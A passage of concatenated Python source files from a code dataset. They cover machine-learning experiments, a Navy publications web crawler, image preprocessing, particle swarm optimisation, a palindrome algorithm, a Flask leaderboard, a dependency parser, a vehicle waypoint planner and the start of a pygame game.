range(int(3*PERTUBTIME)):\n\n per_ele = np.random.randint(-1,1, size=feat_data_reglab.shape[1])\n final_input = feat_data_reglab[i,:] + (feat_data_reglab[i,:]*per_ele/100)\n buffer = np.append(buffer,final_input)\n buffer = np.append(buffer,1)\n \n buffer = np.reshape(buffer,(-1,feat_data_reglab.shape[1]+1))\n training_data = np.append(training_data,buffer)\n\n #for optsaliency map\n else:\n\n buffer = np.array([])\n\n for j in range(PERTUBTIME):\n\n per_ele = np.random.randint(-1,1, size=feat_data_reglab.shape[1])\n final_input = feat_data_reglab[i,:] + (feat_data_reglab[i,:]*per_ele/100)\n buffer = np.append(buffer,final_input)\n buffer = np.append(buffer,0)\n \n buffer = np.reshape(buffer,(-1,feat_data_reglab.shape[1]+1))\n training_data = np.append(training_data,buffer)\n #[:,-1] ==> label of Xt (for classify),[:,-2] ==> label of threshold (for regression)\n training_data = np.reshape(training_data,(-1,feat_data_reglab.shape[1]+1))\n\n #==============\n #start training ---> PCA+DNN\n EPOCHS = 500\n BATCHSIZE = 10\n HIDDEN_NEURON_SCALE = 4\n PCA_COMPONENTS = 10\n\n pca = PCA(n_components=PCA_COMPONENTS)\n pca.fit(training_data[:,:-2])\n training_data_pca = pca.transform(training_data[:,:-2])\n stick_reglab = np.reshape(training_data[:,-2],(-1,1))\n training_data_pca = np.append(training_data_pca,stick_reglab,axis = 1)\n scaler_DNN = MinMaxScaler(feature_range=(-1, 1))\n training_data_pca = scaler_DNN.fit_transform(training_data_pca,(-1,1))\n\n #split in to the train and test set\n row = round(0.9 * training_data_pca.shape[0])\n np.random.shuffle(training_data_pca)\n train = training_data_pca[:int(row), :]\n x_train = train[:, :-1]\n y_train = train[:, -1]\n x_test = training_data_pca[int(row):, :-1]\n y_test = training_data_pca[int(row):, -1]\n\n #print(x_train.shape[1])\n #print(x_test.shape)\n\n model = XGBRegressor(colsample_bytree=0.4603, gamma=0.0468, \n learning_rate=0.05, max_depth=3, \n min_child_weight=1.7817, n_estimators=2200,\n reg_alpha=0.4640, reg_lambda=0.8571,\n subsample=0.5213, random_state =7, nthread = -1).fit(x_train,y_train)\n predicted = model.predict(x_test)\n predicted = predicted.reshape(len(predicted),1)\n\n #print(predicted.shape)\n inverse_x = np.concatenate((x_test, predicted), axis=1)\n inverse_x = scaler_DNN.inverse_transform(inverse_x)\n inverse_x = inverse_x[:,-1]\n inverse_x = np.reshape(inverse_x,(-1,1))\n inverse_x = np.concatenate((training_data[-len(inverse_x):,:-2], inverse_x), axis=1)\n inverse_x = scaler_Train.inverse_transform(inverse_x)\n inverse_x = inverse_x[:,-1]\n\n y_test = y_test.reshape((len(y_test), 1))\n inverse_y = np.concatenate((x_test, y_test), axis=1)\n inverse_y = scaler_DNN.inverse_transform(inverse_y)\n inverse_y = inverse_y[:,-1]\n inverse_y = np.reshape(inverse_y,(-1,1))\n inverse_y = np.concatenate((training_data[-len(inverse_y):,:-2], inverse_y), axis=1)\n inverse_y = scaler_Train.inverse_transform(inverse_y)\n inverse_y = inverse_y[:,-1]\n loss.append(mean_squared_error(inverse_y,inverse_x))\n print('mse = ' , mean_squared_error(inverse_y,inverse_x))\nloss = np.array(loss)\nprint(loss)\nprint(\"Mean: \",np.mean(loss))\nprint(\"母體標準差: \", np.std(loss, ddof=0))\nprint(\"樣本標準差: \", np.std(loss, ddof=1))\n# fig = plt.figure(facecolor='white')\n# ax = fig.add_subplot(111)\n# ax.plot(inverse_y, label='True Data')\n# plt.plot(inverse_x, label='Prediction')\n# plt.legend()\n# plt.show()","sub_path":"xgb.py","file_name":"xgb.py","file_ext":"py","file_size_in_byte":5237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"382162038","text":"import bs4\nimport re\nimport os\nimport requests\nimport json\nimport datetime\nfrom typing import Iterable\n\nfrom dataPipelines.gc_crawler.requestors import MapBasedPseudoRequestor\nfrom dataPipelines.gc_crawler.exec_model import Crawler, Parser, Pager\nfrom dataPipelines.gc_crawler.data_model import Document, DownloadableItem\nfrom dataPipelines.gc_crawler.utils import abs_url\n\nfrom . import SOURCE_SAMPLE_DIR, BASE_SOURCE_URL\n\n\nclass BupersPager(Pager):\n \"\"\"Pager for Bupers crawler\"\"\"\n\n def iter_page_links(self) -> Iterable[str]:\n \"\"\"Iterator for page links\"\"\"\n yield self.starting_url\n\nclass BupersParser(Parser):\n \"\"\"Parser for Bupers Issuance crawler\"\"\"\n\n def parse_docs_from_page(self, page_url: str, page_text: str) -> Iterable[Document]:\n \"\"\"Parse document objects from page of text\"\"\"\n\n r = requests.get(page_url)\n soup = bs4.BeautifulSoup(r.content, features=\"html.parser\")\n name = soup.find(id='dnn_CenterPane_Top').find('a')['name']\n pdf_url = soup.find(id='LiveHTMLWrapper' + name).find_all('a')\n pdf_url = [(\"https://www.mynavyhr.navy.mil\" + item['href']).replace(' ', '%20') for item in pdf_url]\n\n new_url = []\n for i in range(len(pdf_url)):\n if pdf_url[\n i] == 'https://www.mynavyhr.navy.mil/Portals/55/Reference/Instructions/BUPERS/BUPERSINST_12410.25.pdf?ver=mKLgKvdYUIaubAZs0PbkUg%3d%3d':\n pass\n elif pdf_url[i] not in new_url and (pdf_url[i][-4:] != \"docx\"):\n new_url.append(pdf_url[i])\n pdf_url = new_url\n l = soup.find(id='LiveHTMLWrapper' + name).find_all(attrs={'style': 'font-size: 12px;'})\n\n nums = []\n titles = []\n dates = []\n bupcount = 0\n for index, val in enumerate(l):\n try:\n # checking for 1640.20B. first document doesn't have a link, but CH-1 does.\n if val.text.replace('\\xa0', ' ').split('\\n')[-1] == \"1640.20B CH-1\":\n nums.append(val.text.replace('\\xa0', ' ').split('\\n')[-1])\n titles.append(\n l[index + 1].text.strip().replace('\\xa0', '').replace('-', '').replace('\\n', '').replace(\n '\\u200b', ''))\n dates.append(l[index + 2].text.replace('\\u200b', '').strip().split('\\n')[-1])\n\n # CH-1 for 5450.49D doesn't have a link associated with it\n elif val.text.split('\\n')[-1] == \"5450.49D CH-1\":\n nums.append(\n val.text.replace('\\xa0', '').replace('-', '').replace('\\u200b', '').replace(' ', \"\").split(\n '\\n')[0])\n titles.append(\n l[index + 1].text.strip().replace('\\xa0', '').replace('-', '').replace('\\n', '').replace(\n '\\u200b', ''))\n dates.append(l[index + 2].text.replace('\\u200b', '').strip().split('\\n')[0])\n\n # checking for the repeated BUPERSNOTE 5215 files\n # for the 2nd repeated file, title/date don't appear\n elif val.text.replace('\\xa0', '').replace('-', '').replace('\\u200b', '').replace('\\n', '').replace(' ',\n \"\") == \"BUPERSNOTE 5215\":\n if bupcount > 0:\n nums.append(val.text.replace('\\xa0', '').replace('-', '').replace('\\u200b', '').replace('\\n',\n '').replace(\n ' ', \"\") + \"(2)\")\n titles.append(\"Cancellation of BUPERSINST 7040.6B\")\n dates.append(\"12/7/2020\")\n else:\n nums.append(val.text.replace('\\xa0', '').replace('-', '').replace('\\u200b', '').replace('\\n',\n '').replace(\n ' ', \"\"))\n titles.append(\n l[index + 1].text.strip().replace('\\xa0', '').replace('-', '').replace('\\n', '').replace(\n '\\u200b', ''))\n dates.append(l[index + 2].text.replace('\\u200b', '').strip().split('\\n')[0])\n bupcount += 1\n\n # checking for the 1900.8E docs. the other 2 chapters don't have links\n elif val.text.split('\\n')[-1] == \"1900.8E CH-2\":\n nums.append(val.text.split('\\n')[0])\n titles.append(\n l[index + 1].text.strip().replace('\\xa0', '').replace('-', '').replace('\\n', '').replace(\n '\\u200b', ''))\n dates.append(l[index + 2].text.replace('\\u200b', '').strip().split('\\n')[0])\n\n # checking for the Women's correction program, 1640.27. this file doesn't have a title in the correct format\n elif val.text.replace('\\xa0', '').replace('-', '').replace('\\u200b', '').replace('\\n', '') == \"1640.27\":\n nums.append(val.text.replace('\\xa0', '').replace('-', '').replace('\\u200b', '').replace('\\n', ''))\n titles.append(\"Women's Correction Program\")\n dates.append(l[index + 1].text.replace('\\u200b', '').strip())\n\n # checking for the BUPERSNOTE file. This is the only file number that starts with a word, not a number.\n elif val.text.replace('\\xa0', '').replace('-', '').replace('\\u200b', '').replace('\\n', '')[\n 0:10] == \"BUPERSNOTE\":\n nums.append(\n val.text.replace('\\xa0', '').replace('-', '').replace('\\u200b', '').replace('\\n', '').replace(\n \" \", \"\"))\n titles.append(\n l[index + 1].text.strip().replace('\\xa0', '').replace('-', '').replace('\\n', '').replace(\n '\\u200b', ''))\n dates.append(l[index + 2].text.replace('\\u200b', '').strip())\n\n # checking for all other files:\n elif int(val.text.replace('\\xa0', '').replace('-', '').replace('\\u200b', '').split('.')[0]):\n if val.text.strip().replace('\\xa0', '').replace('-', '').replace('\\u200b', '').split('\\n')[0] in (\n \"1401.5C\", \"1730.11A\", \"5800.1A\", \"1640.20B\"):\n if val.text.strip().replace('\\xa0', '').replace('-', '').replace('\\u200b', '').split('\\n')[\n 0] == \"1640.20B\":\n pass\n else:\n nums.append(\n val.text.strip().replace('\\xa0', '').replace('-', '').replace('\\u200b', '').split('\\n')[\n 0])\n titles.append(\n l[index + 1].text.strip().replace('\\xa0', '').replace('-', '').replace('\\u200b', ''))\n if val.text.strip().replace('\\xa0', '').replace('-', '').replace('\\u200b', '').split('\\n')[\n 0] == \"5800.1A\":\n dates.append(l[index + 2].text.replace('\\u200b', '').strip().split('\\n')[0])\n else:\n dates.append(l[index + 2].text.replace('\\u200b', '').strip())\n elif len(val.text.split('\\n')) > 1:\n # for each repeated document\n if val.text.strip().replace('\\xa0', '').replace('-', '').replace('\\u200b', '').split('\\n')[\n 1] in (\"Vol 1\", \"Vol 2\"):\n nums.append(\" \".join(\n val.text.strip().replace('\\xa0', '').replace('-', '').replace('\\u200b', '').split(\n '\\n')))\n titles.append(l[index + 1].text)\n dates.append(l[index + 2].text.replace('\\u200b', '').split('\\n')[0].strip())\n else:\n for n in val.text.strip().replace('\\xa0', '').replace('-', '').replace('\\u200b', '').split(\n '\\n'):\n # append the doc nums\n nums.append(n)\n titles.append(l[index + 1].text)\n for n in l[index + 2].text.strip().replace('\\u200b', '').split('\\n'):\n # append the dates\n dates.append(n.strip())\n else:\n nums.append(val.text.strip().replace('\\xa0', '').replace('-', '').replace('\\u200b', ''))\n titles.append(\n l[index + 1].text.strip().replace('\\xa0', '').replace('-', '').replace('\\u200b', ''))\n dates.append(l[index + 2].text.replace('\\u200b', '').strip())\n except:\n pass\n\n parsed_docs = []\n for i in range(len(pdf_url)):\n dtype = \"BUPERSINST\"\n dnum = nums[i]\n dtitle = titles[i].replace(\"\\u00a0\", \" \").replace(\"\\u200b\", \"\").replace('\\n ', \"\").strip()\n dname = dtype + \" \" + dnum\n cac_login_required = False\n publication_date = dates[i]\n url = pdf_url[i]\n pdf_di = DownloadableItem(doc_type='pdf', web_url=url)\n version_hash_fields = {\n \"item_currency\": url.split('/')[-1].split('?')[0], # version metadata found on pdf links\n \"document_title\": dtitle,\n \"document_number\": dnum.strip()\n }\n doc = Document(\n doc_name=dname.strip(),\n doc_title=dtitle,\n doc_num=dnum.strip(),\n doc_type=dtype,\n publication_date=publication_date,\n cac_login_required=cac_login_required,\n crawler_used=\"Bupers_Crawler\",\n source_page_url=page_url.strip(),\n version_hash_raw_data=version_hash_fields,\n downloadable_items=[pdf_di]\n )\n\n parsed_docs.append(doc)\n\n return parsed_docs\n\n\nclass BupersCrawler(Crawler):\n \"\"\"Crawler for the example web scraper\"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(\n *args,\n **kwargs,\n pager=BupersPager(\n starting_url=BASE_SOURCE_URL\n ),\n parser=BupersParser()\n )\n\n\nclass FakeBupersCrawler(Crawler):\n \"\"\"Bupers crawler that just uses stubs and local source files\"\"\"\n\n def __init__(self, *args, **kwargs):\n with open(os.path.join(SOURCE_SAMPLE_DIR, 'bupers_pubs.html')) as f:\n default_text = f.read()\n\n super().__init__(\n *args,\n **kwargs,\n pager=BupersPager(\n requestor=MapBasedPseudoRequestor(\n default_text=default_text\n ),\n starting_url=BASE_SOURCE_URL\n ),\n parser=BupersCrawler()\n )\n","sub_path":"dataPipelines/gc_crawler/bupers_pubs/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":11346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"108812943","text":"\"\"\"\n\nPre-Processing \nUses: CV2\nClassical filters\n\n\"\"\"\n\nimport cv2\nimport numpy as np\n\n#Parameters\n\nIMAGE_FILE = 'signature_sketch.jpg'\n\nSIGNATURE_CROP = [0,0,210,460] #Temporary values\nMEDIANBLUR_KERNEL_SIZE = 3\nNORMALIZED_X, NORMALIZED_Y = 200, 100\n\n#Load Image\n\nimg = cv2.imread(IMAGE_FILE, 0)\nprint(\"Size: \", img.shape)\nimg = img[SIGNATURE_CROP[0]:SIGNATURE_CROP[2], SIGNATURE_CROP[1]:SIGNATURE_CROP[3]]\nscale_x = SIGNATURE_CROP[3] - SIGNATURE_CROP[1]\nscale_y = SIGNATURE_CROP[2] - SIGNATURE_CROP[0]\n\n#Filtering:\n\n#Noise Reduction\nmedian_blurred_img = cv2.medianBlur(img, MEDIANBLUR_KERNEL_SIZE)\n\n#Background Elimination\nret, bg_eliminated_img = cv2.threshold(median_blurred_img, 127, 255, cv2.THRESH_BINARY)\n\n#Bounding Box\nimg_contours, hierarchy = cv2.findContours(bg_eliminated_img,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)\n\nx2=0\ny2=0\nx1 = scale_x\ny1 = scale_y\nprint(scale_x, scale_y, \"DEBUG\")\nfor cnt_temp in img_contours[:-1]:\n\tx,y,w,h = cv2.boundingRect(cnt_temp)\n\tx1 = min(x1, x)\n\ty1 = min(y1, y)\n\tx2 = max(x2, x+w)\n\ty2 = max(y2, y+h)\n\t#cv2.rectangle(bg_eliminated_img,(x,y),(x+w,y+h),(0,255,0))\n\nprint(x1, y1, x2, y2)\ncv2.rectangle(bg_eliminated_img,(x1,y1),(x2,y2),(0,255,0))\n\n#Scale Normalization\nscale_normalized_img = cv2.resize(bg_eliminated_img[y1:y2, x1:x2], (NORMALIZED_X,NORMALIZED_Y))\n\n#Display\ncv2.imshow('image',img)\ncv2.imshow('im2', scale_normalized_img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"616825800","text":"import numpy as np\nfrom sys import argv\nfrom phonecal import io\nfrom phonecal.raw import pull_apart\nfrom phonecal.general import Rsquare\nfrom phonecal.gain import malus, malus_error\n\nfolder = io.path_from_input(argv)\nroot, images, stacks, products, results = io.folders(folder)\nphone = io.read_json(root/\"info.json\")\n\nangles, means = io.load_means (folder, retrieve_value=io.split_pol_angle)\nprint(\"Read DNG\")\ncolours = io.load_colour(stacks)\n\noffset_angle = np.loadtxt(stacks/\"linearity\"/\"default_angle.dat\")\nprint(\"Read angles\")\nintensities = malus(angles, offset_angle)\nintensities_errors = malus_error(angles, offset_angle, sigma_angle0=1, sigma_angle1=1)\n\nmeans = np.moveaxis(means , 0, 2)\nprint(\"Reshaped arrays\")\n\nmeans_RGBG, _ = pull_apart(means , colours)\nprint(\"Reshaped to RGBG\")\n\nmax_value = 2**phone[\"camera\"][\"bits\"]\nsaturation = 0.95 * max_value\n\ndef linear_R2(x, y, saturate=4000):\n ind = np.where(y < saturate)\n p = np.polyfit(x[ind], y[ind], 1)\n pv = np.polyval(p, x[ind])\n R2 = Rsquare(y[ind], pv)\n return R2\n\nprint(\"Doing R^2 comparison...\", end=\" \")\n\nM_reshaped = means_RGBG.reshape(4, -1, means_RGBG.shape[-1])\n#M_reshaped = np.ma.array(M_reshaped, mask=M_reshaped>4000)\nR2 = np.zeros((4, len(M_reshaped[0])))\nfor j, M in enumerate(M_reshaped):\n R2[j] = [linear_R2(intensities, row, saturate=saturation) for row in M]\n print(j, end=\" \")\n\nnp.save(products/\"linearity_R2.npy\", R2)\n","sub_path":"linearity_calculate_R2.py","file_name":"linearity_calculate_R2.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"81478389","text":"import numpy as np\r\nimport random\r\nimport resltestfunction\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport time\r\n\r\n\r\nclass CLPSO:\r\n def __init__(self, pn, dim, iter_max, xmax, xmin, F_n):\r\n self.F_n = F_n\r\n self.pn = pn\r\n self.dim = dim\r\n self.iter_max = iter_max\r\n self.w0 = 0.9\r\n self.w1 = 0.4\r\n self.c1 = 1.49445\r\n self.c2 = 1.49445\r\n self.m = 7\r\n self.vmax = 100\r\n self.vmin = -100\r\n self.xmax = xmax\r\n self.xmin = xmin\r\n self.x = np.zeros((self.pn, self.dim))\r\n self.v = np.zeros((self.pn, self.dim))\r\n # 个体经历的最佳位置和全局最佳位置\r\n self.pbest = np.zeros((self.pn, self.dim))\r\n self.gbest = np.zeros((1, self.dim))\r\n self.pc = np.zeros(self.pn)\r\n self.flag = np.zeros(self.pn)\r\n self.f = np.zeros((self.pn, self.dim))\r\n # 每个个体的历史最佳适应值\r\n self.p_fit = np.zeros(self.pn) # 每个粒子都有一个历史最佳适应值\r\n # 全局最佳适应值\r\n self.fit = 1e10\r\n\r\n # @staticmethod\r\n # def F_n(x):\r\n # return np.sum(x**2)\r\n\r\n def init_population(self):\r\n self.x = self.xmin + (self.xmax - self.xmin) * np.random.rand(self.pn, self.dim)\r\n self.v = self.vmin + 2 * self.vmax * np.random.rand(self.pn, self.dim)\r\n self.pbest = self.x.copy()\r\n self.p_fit = np.array([self.F_n(self.x[i]) for i in range(self.x.shape[0])])\r\n self.fit = np.min(self.p_fit)\r\n self.gbest = self.x[np.argmin(self.p_fit)].copy()\r\n ind = np.array([i - 1 for i in range(self.pn)])\r\n self.pc = 0.05 + 0.45 * (np.exp((10 * ind / (self.pn - 1)) - 1) / (np.exp(10) - 1))\r\n\r\n def iterator(self):\r\n fitness = []\r\n for k in range(self.iter_max):\r\n w = self.w0 * ((self.w0 - self.w1) * k / self.iter_max)\r\n for i in range(self.pn):\r\n temp = self.F_n(self.x[i])\r\n if temp >= self.p_fit[i]:\r\n self.flag[i] += 1\r\n if temp < self.p_fit[i]:\r\n self.p_fit[i] = temp\r\n self.pbest[i] = self.x[i].copy()\r\n self.flag[i] = 0\r\n if self.p_fit[i] < self.fit:\r\n self.gbest = self.x[i].copy()\r\n self.fit = self.p_fit[i].copy()\r\n for i in range(self.pn):\r\n if self.flag[i] >= self.m:\r\n for j in range(self.dim):\r\n if random.random() < self.pc[i]:\r\n f1 = int(np.floor(random.random() * self.pn))\r\n f2 = int(np.floor(random.random() * self.pn))\r\n if self.F_n(self.pbest[f1]) < self.F_n(self.pbest[f2]):\r\n self.f[i][j] = f1\r\n else:\r\n self.f[i][j] = f2\r\n else:\r\n self.f[i][j] = i\r\n self.flag[i] = 0\r\n else:\r\n tt = random.randint(0, 32767)\r\n for j in range(self.dim):\r\n if j == tt % self.dim:\r\n self.f[i][j] = tt % self.pn\r\n else:\r\n self.f[i][j] = i\r\n for i in range(self.pn):\r\n for j in range(self.dim):\r\n self.v[i][j] = w * self.v[i][j] + self.c1 * random.random() * (self.pbest[int(self.f[i][j])][j] - self.x[i][j])\r\n self.v[i][j] = np.clip(self.v[i][j], self.vmin, self.vmax)\r\n self.x[i][j] = np.clip(self.x[i][j] + self.v[i][j], self.xmin, self.xmax)\r\n\r\n fitness.append(self.fit)\r\n return fitness\r\n\r\n\r\n\r\nf_list1 = [resltestfunction.f1, resltestfunction.f2, resltestfunction.f3, resltestfunction.f4, resltestfunction.f5] #单多峰\r\n\r\nfitness_bound = {f_list1[0]: (-100, 100), f_list1[1]: (-100, 100), f_list1[2]: (-100, 100), f_list1[3]: (-15, 10), f_list1[4]: (-10, 10)}\r\n\r\ndims=[100]\r\niter = 30\r\nMaxiter = 500\r\nall_f = [f_list1]\r\nprint(\"begin my iteration\")\r\nexcel = pd.ExcelWriter('newtest-CLPSO-it500-d100.xlsx')\r\nfor ex_index, fn in enumerate(all_f):\r\n function_name = [\"f\" + str(i + 1) for i in range(len(fn))]\r\n df = pd.DataFrame(columns=['mean', 'std', 'min'], index=function_name)\r\n for index, f in enumerate(fn):\r\n result = []\r\n print(\"%d_%d processing\" % (ex_index, index))\r\n for i in range(iter):\r\n [lower, upper] = fitness_bound[f]\r\n\r\n my_pso =CLPSO(pn=60, dim=dims[ex_index], iter_max=Maxiter, xmax=upper, xmin=lower, F_n=f)\r\n my_pso.init_population()\r\n fitness = my_pso.iterator()\r\n # print(np.min(fitness), np.mean(fitness), np.std(fitness))\r\n # print(\"---------------------------------------\")\r\n result.append(np.min(fitness))\r\n if i == iter - 1:\r\n df.loc[function_name[index], 'mean'] = np.mean(result)\r\n df.loc[function_name[index], 'std'] = np.std(result)\r\n df.loc[function_name[index], 'min'] = np.min(result)\r\n # result[index, :] = [np.min(fitness), np.mean(fitness), np.std(fitness)]\r\n df.to_excel(excel, sheet_name=str(ex_index + 1))\r\n excel.save()\r\n","sub_path":"CS/程序/粒子群/CAPSO-6-CLPSO/new-6-CLPSO.py","file_name":"new-6-CLPSO.py","file_ext":"py","file_size_in_byte":5392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"547565471","text":"class Solution(object):\n def countSubstings(self, s):\n \"\"\"\n :type s: str\n :rtype:int\n \"\"\"\n # 返回一个数组,对应位置为以i为中心的最长回文字符串半径\n p = self.manachar(s)\n print(p)\n count_num = 0\n for p_num in p:\n count_num += p_num // 2\n return count_num\n\n def manachar(self, s):\n s_new = ''\n for word in s:\n s_new += '#' + word\n s_new = '$' + s_new + '#' + '&'\n print(s_new)\n len_s_new = len(s_new)\n p = [0 for _ in range(len_s_new)]\n # max_substring_len, max_substring_pos = -1, -1\n idx, mx = 0, 0\n for i in range(1, len_s_new - 1):\n if (i < mx):\n p[i] = min(p[2 * idx - i], mx - i)\n else:\n p[i] = 1\n\n # while((i + p[i] < len_s_new)and (s_new[i - p[i]] == s_new[i +\n # p[i]])):if p_num > 1\n while(s_new[i - p[i]] == s_new[i + p[i]]):\n p[i] += 1\n\n if i + p[i] > mx:\n mx = i + p[i]\n idx = i\n\n # if p[i] - 1 > max_substring_len:\n # max_substring_len = p[i] - 1\n # max_substring_pos = i\n\n # print(max_substring_pos, max_substring_len)\n # istart = (max_substring_pos - max_substring_len - 1) // 2\n\n return p\n\n\nif __name__ == '__main__':\n s = \"abc\"\n print(s)\n sub = Solution().countSubstings(s)\n print(sub)\n","sub_path":"LeetCode/647.palindromicsubstrings.py","file_name":"647.palindromicsubstrings.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"83732627","text":"import csv\n\nfrom flask import Flask\nfrom flask import render_template\n\nfrom google.cloud import datastore\nfrom google.oauth2 import service_account\n\n\ncredentials = service_account.Credentials \\\n .from_service_account_file('./bigdatatech-warsaw-challenge-219525419ec7.json')\nclient = datastore.Client(project=credentials.project_id, credentials=credentials)\napp = Flask(__name__,\n static_url_path='/static'\n)\n\n@app.route(\"/\")\ndef data_store():\n query = client.query(kind=\"race_results\")\n query.order = ['time']\n\n results = query.fetch(limit=200)\n results = deduplicate_results(results)\n return render_template('index.html', results=results[:10])\n\n\n@app.route(\"/csv\")\ndef csv_store():\n results = list()\n with open('results.csv', newline='') as csvfile:\n reader = csv.reader(csvfile, delimiter=',')\n\n for row in reader:\n results.append({\n 'username' : row[0],\n 'time' : int(row[1])\n })\n\n results.sort(key=lambda result: result['time'],reverse=False)\n results = deduplicate_results(results)\n return render_template('index.html', results=results[:10])\n\n\ndef deduplicate_results(results):\n deduplication_info = set()\n deduplicated_results = list()\n\n for result in results:\n if result['username'] not in deduplication_info:\n deduplicated_results.append(result)\n deduplication_info.add(result['username'])\n\n return deduplicated_results\n\n\nif __name__ == \"__main__\":\n app.run()\n\n\n","sub_path":"webapp/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"605428252","text":"def arc_hybrid_train(sentence):\n\n bu = [] # buffer\n st = [] # stack\n ar = [] # arcset\n\n X = []\n Y = []\n index_number = [] # [[-1, -1, 2, 3], [1, 2, 4, 6], ... ]\n\n for eojul in sentence:\n bu.append(eojul)\n X.append(eojul.wordvec)\n\n sequence_length = len(bu)\n config_num = 0\n while not (len(bu) == 1 and len(st) == 0):\n if len(st) == 0:\n index_number.append([-1, -1, -1, bu[0].pos - 1])\n st.append(bu[0])\n bu.pop(0)\n Y.append([1, 0]) # SHIFT\n elif len(st) == 1:\n index_number.append([-1, -1, st[-1].pos - 1, bu[0].pos - 1])\n if st[-1].head_pos == bu[0].pos: # LEFT\n Y.append([0, 1]) # LEFT-ARC\n st.pop(-1)\n else: # SHIFT\n Y.append([1, 0])\n st.append(bu[0])\n bu.pop(0)\n elif len(st) == 2:\n index_number.append([-1, st[-2].pos - 1, st[-1].pos - 1, bu[0].pos - 1])\n if st[-1].head_pos == bu[0].pos:\n Y.append([0, 1]) # LEFT-ARC\n st.pop(-1)\n else:\n Y.append([1, 0])\n st.append(bu[0])\n bu.pop(0)\n else:\n index_number.append([st[-3].pos - 1, st[-2].pos - 1, st[-1].pos - 1, bu[0].pos - 1])\n if st[-1].head_pos == bu[0].pos:\n Y.append([0, 1]) # LEFT-ARC\n st.pop(-1)\n else:\n Y.append([1, 0])\n st.append(bu[0])\n bu.pop(0)\n config_num += 1\n # print(\"=============================================\")\n # print(\"{} : {}\".format(config_num, st))\n # print(\"{} : {}\".format(config_num, bu))\n # print(\"{} : index_number length: {}\".format(config_num, len(index_number)))\n # print(\"{} : {}\".format(config_num, Y))\n # print(\"{} : {}\".format(config_num, sequence_length))\n # print(\"=============================================\")\n # print(\"\\n\\n\")\n\n assert len(X) == sequence_length\n assert len(index_number) == config_num == len(Y)\n\n return X, Y, index_number, config_num\n\n\n# def archybrid_test(sentence):\n# pass\n","sub_path":"sen_parser.py","file_name":"sen_parser.py","file_ext":"py","file_size_in_byte":2246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"629097617","text":"from collections import deque\nfrom copy import deepcopy\n\nfrom distance import find_waypoint_distance\n\n\ndef get_waypoint_speed(waypoint):\n return waypoint.twist.twist.linear.x\n\n\ndef set_waypoint_speed(waypoint, speed):\n waypoint.twist.twist.linear.x = speed\n\n\nclass Plan(object):\n def __init__(self, base_waypoints, start_index, num_waypoints, trajectory):\n self.base_waypoints = base_waypoints\n self.start_index = start_index\n self.num_waypoints = num_waypoints\n self.trajectory = trajectory\n\n self.final_speed = float('inf')\n self.waypoints = deque()\n self.end_index = start_index\n self.end_distance = 0.0\n self.__fill()\n self.__spur_on_if_needed()\n\n def advance(self, waypoint_index):\n delta = waypoint_index - self.start_index\n self.start_index += delta\n\n while delta > 0 and len(self.waypoints) > 0:\n delta -= 1\n self.waypoints.popleft()\n self.__fill()\n\n def get_speeds(self):\n return [get_waypoint_speed(waypoint) for waypoint in self.waypoints]\n\n def __fill(self):\n while not self.__done() and not self.__full():\n waypoint = deepcopy(self.base_waypoints[self.end_index])\n self.end_index += 1\n\n if len(self.waypoints) > 0:\n self.end_distance += find_waypoint_distance(\n self.waypoints[-1], waypoint)\n\n if self.trajectory is not None:\n time = self.trajectory.find_time_to_position(self.end_distance)\n if time is None:\n self.final_speed = self.trajectory.speed(\n self.trajectory.horizon)\n self.trajectory = None\n else:\n speed = self.trajectory.speed(time)\n\n if self.trajectory is None:\n speed = self.final_speed\n\n if speed < get_waypoint_speed(waypoint):\n set_waypoint_speed(waypoint, speed)\n self.waypoints.append(waypoint)\n\n def __done(self):\n return self.end_index >= len(self.base_waypoints)\n\n def __full(self):\n return len(self.waypoints) >= self.num_waypoints\n\n def __spur_on_if_needed(self):\n \"\"\"\n The car often needs some encouragement to get started.\n \"\"\"\n if len(self.waypoints) < 2:\n return\n next_speed = (get_waypoint_speed(self.waypoints[0]) +\n get_waypoint_speed(self.waypoints[1])) / 2.0\n set_waypoint_speed(self.waypoints[0], next_speed)\n","sub_path":"ros/src/waypoint_updater/plan.py","file_name":"plan.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"446526221","text":"import sys\r\nimport pygame\r\nfrom player import *\r\nfrom setting import *\r\n\r\npygame.init()\r\nvec = pygame.math.Vector2\r\nclass App :\r\n def __init__(self):\r\n self.screen = pygame.display.set_mode((WIDTH, HEIGHT))\r\n self.clock = pygame.time.Clock()\r\n self.running = True\r\n self.state = 'intro'\r\n self.score = 0\r\n self.cell_h = MAZE_HEIGHT //COLS\r\n self.cell_w = MAZE_WIDTH //ROWS\r\n self.player = Player(self,PLAYER_START_POSITION)\r\n self.load()\r\n def run(self):\r\n while self.running :\r\n if self.state == 'intro':\r\n self.start_event()\r\n self.start_update()\r\n self.start_draw()\r\n elif self.state == 'playing':\r\n self.playing_event()\r\n self.playing_update()\r\n self.playing_draw()\r\n else:\r\n self.running = False\r\n self.clock.tick(FPS)\r\n pygame.quit()\r\n sys.exit()\r\n##################### HELP FUNCTION ################################33\r\n def draw_text(self, word,screen,pos, size, color, font_name, center = False):\r\n font = pygame.font.SysFont(font_name, size)\r\n text = font.render(word, False, color)\r\n text_size = text.get_size()\r\n if center:\r\n pos[0] = pos[0] - text_size[0] //2\r\n pos[1] = 